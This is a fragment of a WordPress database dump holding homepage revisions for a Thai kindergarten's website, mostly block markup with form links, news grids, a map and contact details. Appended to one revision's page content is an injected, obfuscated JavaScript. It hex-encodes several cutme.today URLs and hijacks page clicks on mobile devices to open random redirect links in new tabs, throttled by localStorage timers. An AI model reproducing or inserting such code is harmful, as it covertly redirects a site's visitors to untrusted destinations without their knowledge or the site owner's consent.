{\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:44:07','2024-08-30 02:44:07','',19,'http://watprato.ssk.in.th/?p=283',0,'revision','',0),
(284,2,'2024-08-30 09:47:29','2024-08-30 02:47:29','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn 